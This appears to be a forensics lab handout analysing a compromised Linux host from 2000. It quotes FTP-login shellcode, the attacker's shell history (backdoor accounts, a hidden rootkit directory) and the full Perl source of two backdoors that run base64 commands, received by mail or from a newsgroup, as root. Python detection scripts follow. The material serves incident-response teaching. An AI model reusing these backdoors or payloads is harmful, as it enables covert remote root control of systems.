I) Off-line inspection
-----------------------

The ntec81 directory mirrors some directories of the ntec81 host at root level. The mirror was made with ttcp and tar; hence the access and status-change times (atime, ctime) in these directories are not accurate. The mtime (modify time), however, should be correct.

i) cd to the ntec81 directory.

ii) Examine the log files in var/log and find evidence to support your findings in part II) Network Packet Inspection.

From var/log/messages, eth0 entered promiscuous mode:

    Nov 1 14:10:51 ntec81 kernel: tcpdump uses obsolete (PF_INET,SOCK_PACKET)
    Nov 1 14:10:51 ntec81 kernel: device eth0 entered promiscuous mode
    Nov 1 14:11:27 ntec81 kernel: device eth0 left promiscuous mode
    Nov 1 14:11:27 ntec81 kernel: device eth0 entered promiscuous mode

This should be the tcpdump sniffer being started (the kernel logs the tool name together with the interface state change).

Anonymous FTP from ntec88:

    Nov 1 16:11:53 ntec81 ftpd[2800]: ANONYMOUS FTP LOGIN FROM ntec88 [192.168.128.88], abc

FTP attack at Nov 2 08:50:14 from ntec94. ftpd logs the "password" an anonymous user supplies (normally an e-mail address); here that field contains binary exploit code instead, and the attempt is repeated four minutes later:

    Nov 2 08:50:14 ntec81 ftpd[4082]: ANONYMOUS FTP LOGIN FROM ntec94 [192.168.128.94], 1À1Û1ɰFÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1À^^H° LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11
    Nov 2 08:54:19 ntec81 ftpd[4098]: ANONYMOUS FTP LOGIN FROM ntec94 [192.168.128.94], 1À1Û1ɰFÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1À^^H° LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11

iii) Find any suspicious files and recently updated files, e.g.

    find etc -user root -perm -4000 -print -xdev
    find etc -mtime -10 -type f -print -xdev
    find home -mtime -10 -type f -print -xdev

On the mirror (inspected long after the incident, so a much wider -mtime window is used):

    ntec1-20:/mnt2/local/share/forensics/ntec81> find etc -user root -perm -4000 -print -xdev
    etc/.cmd01

    ls -l etc/.cmd01
    -rwsr-xr-x 1 root root 12274 Oct 19 2000 etc/.cmd01*

A set-UID root program with a hidden dotfile name directly under /etc is the first suspicious find.

    find etc -mtime -388 -type f -print -xdev | xargs ls -ltr
    -rwxr-xr-x 1 root root 1240 Nov 1 2000 etc/rc.d/rc.local
    -rw-r--r-- 1 root root 627 Nov 1 2000 etc/named.conf
    -rw-r--r-- 1 root root 138 Nov 1 2000 etc/hosts
    -rw-r--r-- 1 root root 3084 Nov 2 2000 etc/inetd.conf
    -rw-rw-r-- 1 root ftp 12288 Nov 2 2000 etc/psdevtab
    -rw----r-- 1 root root 510 Nov 2 2000 etc/gshadow-
    -rw----r-- 1 root root 640 Nov 2 2000 etc/group-
    -r-----r-- 1 root root 1324 Nov 2 2000 etc/shadow-
    -rw-r--r-- 1 root root 1215 Nov 2 2000 etc/passwd-
    -r-----r-- 1 root root 500 Nov 2 2000 etc/gshadow
    -rw-r--r-- 1 root root 625 Nov 2 2000 etc/group
    -r-----r-- 1 root root 1324 Nov 2 2000 etc/shadow
    -rw-r--r-- 1 root root 1215 Nov 2 2000 etc/passwd
    -rwxr-xr-x 1 root root 774 Nov 3 2000 etc/.email
    -rw-r--r-- 1 root root 74 Nov 3 2000 etc/sendmail.cw
    -rw-r--r-- 1 root root 4096 Nov 3 2000 etc/mail/virtusertable.db
    -rw-r--r-- 1 root root 4096 Nov 3 2000 etc/mail/mailertable.db
    -rw-r--r-- 1 root root 4096 Nov 3 2000 etc/mail/domaintable.db
    -rw-r--r-- 1 root root 20480 Nov 3 2000 etc/mail/access.db
    -rw-r--r-- 1 root root 20480 Nov 3 2000 etc/aliases.db
    -rw-r--r-- 1 root root 8 Nov 3 2000 etc/ntp/drift
    -rw----r-- 1 root root 512 Nov 3 2000 etc/ssh_random_seed
    -rw-r--r-- 1 root root 263 Nov 3 2000 etc/mtab

    find home -mtime -388 -type f -print -xdev | xargs ls -nl
    -rw----r-- 1 21669 21669 204 Nov 3 2000 home/user1/.Xauthority
    -rw----r-- 1 21669 21669 782 Nov 3 2000 home/user1/.bash_history
    -rw-r--r-- 1 21669 21669 24 Nov 2 2000 home/user1/.bash_logout
    -rw-r--r-- 1 21669 21669 230 Nov 2 2000 home/user1/.bash_profile
    -rw-r--r-- 1 21669 21669 124 Nov 2 2000 home/user1/.bashrc
    -rwxr-xr-x 1 21669 21669 333 Nov 2 2000 home/user1/.emacs
    -rw-r--r-- 1 21669 21669 15 Nov 3 2000 home/user1/.forward
    -rw-r--r-- 1 21669 21669 235 Nov 2 2000 home/user1/.kde/share/config/desktop0rc
    -rw-r--r-- 1 21669 21669 116 Nov 2 2000 home/user1/.kde/share/config/kcmdisplayrc
    -rw-r--r-- 1 21669 21669 277 Nov 2 2000 home/user1/.kde/share/config/kdehelprc.1
    -rw-r--r-- 1 21669 21669 160 Nov 2 2000 home/user1/.kde/share/config/kfmrc
    -rw-r--r-- 1 21669 21669 686 Nov 2 2000 home/user1/.kde/share/config/kpanelrc
    -rw-r--r-- 1 21669 21669 435 Nov 2 2000 home/user1/.kderc
    -rwxr-xr-x 1 21669 21669 870 Nov 3 2000 home/user1/.newr
    -rw-r--r-- 1 21669 21669 3394 Nov 2 2000 home/user1/.screenrc

Note the Nov 3 changes to etc/.email, etc/sendmail.cw, home/user1/.forward and home/user1/.newr; they come back in step vi.

iv) Find any trojan rootkit. From such a rootkit program, try to find out the hidden directory, e.g.

    strings ls

which gives, among other output:

    %s - %s
    /usr/lib/.abcd/.1file
    //DIRED//

The hidden directory should be /usr/lib/.abcd.

v) Examine root's and the users' history files to support your findings in part II) Network Packet Inspection.

root/.bash_history shows:

    cd /usr/lib
    ls .abcd
    cd .abcd
    ls
    more .1add
    cd /u
    cd /usr/lib
    cd .src
    cd .abcd
    cat .1addr
    echo "2 192.168.128.94" >> .1addr
    cat .1addr
    netstat
    ps -ef

Hence the hacker host should be 192.168.128.94.

    passwd user3
    exit
    cd /usr/lib/.abcd
    ls
    cat system
    cat system
    cat system
    ..
    adduser usera
    /usr/sbin/adduser usera
    passwd usera

The backdoor user accounts should be user3 and usera, and the sniffer data should be /usr/lib/.abcd/system.

    scp ntec25:/etc/.cmd01 .
    scp -p ntec25:/etc/.cmd01 .
    ls -l .cmd01
    cat .1file
    echo .cmd01 >> .1file
    ls -l /etc/.cmd01
    scp -p ntec25:/etc/.newr .
    cd /usr/lib/.abcd
    ls
    cat .1file
    echo .newr >> .1file
    cat .1file

The hacker tools .cmd01 and .newr were fetched from ntec25, and their names were appended to .1file (the hide list read by the trojaned ls, see step iv) so that they are hidden too.

vi) Examine the users' .forward files and cron jobs (var/spool/cron) to support your findings in part II) Network Packet Inspection.

    find . -name ".forward" -print
    ./user1/.forward
    ntec1-20:/mnt2/local/share/forensics/ntec81/home/user1> more .forward
    "|/etc/.email"

Every mail delivered to user1 is therefore piped into /etc/.email:

    more ../../etc/.email
    #!/usr/bin/perl
    $header=1;
    $doit=0;
    $saveit=0;
    # Read the whole message; @gbuffer keeps every line, @buffer only the body.
    while(<>) {
        push (@gbuffer,$_);
        if ($_ eq "\n") {$header =0;}
        # Trigger words in the Subject header select the action.
        if ($header && /^Subject:/ && /doooit/) {$doit=1;}
        if ($header && /^Subject:/ && /saveeeit/) {$saveit=1;}
        if (!$header) {
            if ($_) {
                # `/etc/.cmd01 $_`;
                push (@buffer,$_);
            }
        }
    }
    if ($doit || $saveit) {
        open (FILE,">/tmp/e.$$");
        print FILE @buffer;
        close(FILE);
        if ($doit) {
            # Body is base64 (mmencode -u decodes it); each decoded line is run
            # through the set-UID root helper /etc/.cmd01, except lines that
            # invoke .newr, which are run directly.
            @cmd_buffer=`/usr/bin/mmencode -u /tmp/e.$$`;
            foreach $cmd (@cmd_buffer) {
                #print $cmd;
                if ($cmd =~ /newr/) {`$cmd`;}
                else {`/etc/.cmd01 $cmd`;}
            }
        }
        if ($saveit) {`/usr/bin/mmencode -u /tmp/e.$$ > /tmp/.sfile`;}
        unlink ("/tmp/e.$$");
    } else {
        # Ordinary mail is delivered to the user's spool so nothing looks wrong.
        open(FILE, ">>/var/spool/mail/user1");
        print FILE @gbuffer;
        close(FILE);
    }

In var/spool/cron/user1:

    more user1
    # DO NOT EDIT THIS FILE - edit the master and reinstall.
    # (/tmp/crontab.5539 installed on Thu Nov 2 22:15:43 2000)
    # (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
    */15 * * * * /etc/.newr cuhk.erg.test testting

Every 15 minutes user1's crontab runs /etc/.newr against the newsgroup cuhk.erg.test, looking for articles whose subject matches "testting":

    more etc/.newr
    #!/usr/bin/perl
    use News::NNTPClient;
    $outfile="/tmp/n.$$";
    $c = new News::NNTPClient("news.erg.cuhk.edu.hk");
    #foreach ($c->newnews($ARGV[0],time() - 3600))
    # $ARGV[0] is the newsgroup, $ARGV[1] the subject pattern to look for.
    ($first, $last) = ($c->group($ARGV[0]));
    for (; $first <= $last; $first++) {
        $subject_ln = ($c->xhdr("Subject",$first))[0];
        #print "$subject_ln\n";
        if ($subject_ln =~ /$ARGV[1]/) {
            # Third word of the subject is a sequence number; /tmp/.1file holds
            # the last one processed (not the same file as /usr/lib/.abcd/.1file).
            $s_no =(split(/\s+/,$subject_ln))[2];
            $p_no=`/bin/cat /tmp/.1file`;
            chop($p_no);
            #print "==> $p_no, $s_no\n";
            if ($p_no >= $s_no) {next;}
            open (FILE,">/tmp/.1file");
            print FILE "$s_no\n";
            close (FILE);
            #print "==> $s_no\n";
            open (FILE,">$outfile");
            print FILE $c->body($first);
            close(FILE);
            # Article body is base64; each decoded line is run via /etc/.cmd01.
            @cmd_buffer = `/usr/bin/mmencode -u $outfile`;
            foreach $cmd (@cmd_buffer) {
                #print $cmd;
                `/etc/.cmd01 $cmd`;
            }
            unlink($outfile);
        }
    }
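The checks from steps iv and vi (hidden paths in a trojaned binary's strings, a .forward that pipes into a program, cron entries that run hidden scripts) can be automated over a mirrored host. The following is an added example written for this handout, not a tool from the exercise; the ls blob is a constructed stand-in that only carries the strings recovered above.

```python
import re
# Any absolute path; components are then checked for dotfile names like .abcd.
PATH_RE = re.compile(r"/[\w.-]+(?:/[\w.-]+)*")
# Standard crontab line: five time fields (or an @macro), then the command.
CRON_RE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){5})(.+)$")

# Constructed stand-in for the trojaned ls (junk bytes around the strings the
# handout recovered); the .forward and crontab are the ones quoted in step vi.
FAKE_LS = (b"\x7fELF\x02\x01\x01" + b"\x00" * 12 + b"%s - %s\x00\xde\xad"
           b"/usr/lib/.abcd/.1file\x00//DIRED//\x00/lib/libc.so.6\x00")
SAMPLE_FORWARD = '"|/etc/.email"\n'
SAMPLE_CRONTAB = ("# DO NOT EDIT THIS FILE - edit the master and reinstall.\n"
                  "*/15 * * * * /etc/.newr cuhk.erg.test testting\n"
                  "0 3 * * * /usr/bin/updatedb\n")

def strings(blob: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs of at least min_len bytes, like strings(1)."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)]

def hidden_paths(text: str) -> list:
    """Absolute paths in text with a component named like a dotfile."""
    found = []
    for path in PATH_RE.findall(text):
        parts = path.split("/")[1:]
        if any(p.startswith(".") and p not in (".", "..") for p in parts):
            found.append(path)
    return found

def forward_indicators(content: str) -> list:
    """.forward entries that pipe mail into a program instead of forwarding it."""
    entries = [e.strip().strip('"') for e in re.split(r"[,\n]", content)]
    return [e for e in entries if e.startswith("|")]

def crontab_indicators(content: str) -> list:
    """Cron commands that reference hidden paths or run something out of /tmp."""
    flagged = []
    for line in content.splitlines():
        m = CRON_RE.match(line)
        if line.lstrip().startswith("#") or not m:
            continue
        if hidden_paths(m.group(1)) or "/tmp/" in m.group(1):
            flagged.append(m.group(1))
    return flagged

def triage(ls_blob: bytes, forward: str, crontab: str) -> dict:
    """Run the three checks together, as an analyst would over a mirrored host."""
    return {"binary": hidden_paths("\n".join(strings(ls_blob))),
            "forward": forward_indicators(forward),
            "cron": crontab_indicators(crontab)}
```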
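The var/log/messages evidence from step ii can likewise be pulled out programmatically: the sniffer start, the promiscuous-mode transitions, and anonymous FTP logins whose logged "password" is not a plausible e-mail address. This is an added example, not part of the exercise; the sample log is constructed from the entries above with the shellcode replaced by a short run of non-printable bytes.

```python
import re
from collections import Counter

# Constructed sample of var/log/messages modelled on the ntec81 entries quoted in
# step ii; the ftpd shellcode is replaced by a short constructed run of non-printable bytes.
SAMPLE_MESSAGES = (
    b"Nov  1 14:10:51 ntec81 kernel: tcpdump uses obsolete (PF_INET,SOCK_PACKET)\n"
    b"Nov  1 14:10:51 ntec81 kernel: device eth0 entered promiscuous mode\n"
    b"Nov  1 14:11:27 ntec81 kernel: device eth0 left promiscuous mode\n"
    b"Nov  1 16:11:53 ntec81 ftpd[2800]: ANONYMOUS FTP LOGIN FROM ntec88 [192.168.128.88], abc\n"
    b"Nov  2 08:50:14 ntec81 ftpd[4082]: ANONYMOUS FTP LOGIN FROM ntec94 [192.168.128.94], "
    b"1\xc01\xdb1\xc9\xb0F\xcd\x1b^0bin0sh\n"
)

TS_RE = re.compile(rb"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) ")
SNIFF_RE = re.compile(rb"kernel: (\S+) uses obsolete \(PF_INET,SOCK_PACKET\)")
PROMISC_RE = re.compile(rb"kernel: device (\S+) (entered|left) promiscuous mode")
FTP_RE = re.compile(rb"ftpd\[\d+\]: ANONYMOUS FTP LOGIN FROM (\S+) \[([\d.]+)\], (.*)$")

def is_payload_like(ident: bytes) -> bool:
    """Anonymous FTP logs the 'password' (normally an e-mail address); control or
    high bytes, or an implausible length, mean it was exploit code, not a credential."""
    return len(ident) > 64 or any(b < 0x20 or b > 0x7E for b in ident)

def analyse_messages(data: bytes) -> list:
    """Return sniffer, promiscuous-mode and anonymous-FTP events in log order."""
    findings = []
    for raw in data.split(b"\n"):
        ts = TS_RE.match(raw)
        if not ts:
            continue
        event = {"time": ts.group(1).decode()}
        if m := SNIFF_RE.search(raw):
            event.update(kind="sniffer", tool=m.group(1).decode())
        elif m := PROMISC_RE.search(raw):
            event.update(kind="promisc", iface=m.group(1).decode(), state=m.group(2).decode())
        elif m := FTP_RE.search(raw):
            ident = m.group(3)
            event.update(kind="ftp_payload" if is_payload_like(ident) else "ftp_anon",
                         host=m.group(1).decode(), addr=m.group(2).decode(), ident_len=len(ident))
        else:
            continue
        findings.append(event)
    return findings

def payload_sources(findings: list) -> Counter:
    """Addresses that sent payload-like idents: cross-check them against the packet capture."""
    return Counter(f["addr"] for f in findings if f["kind"] == "ftp_payload")
```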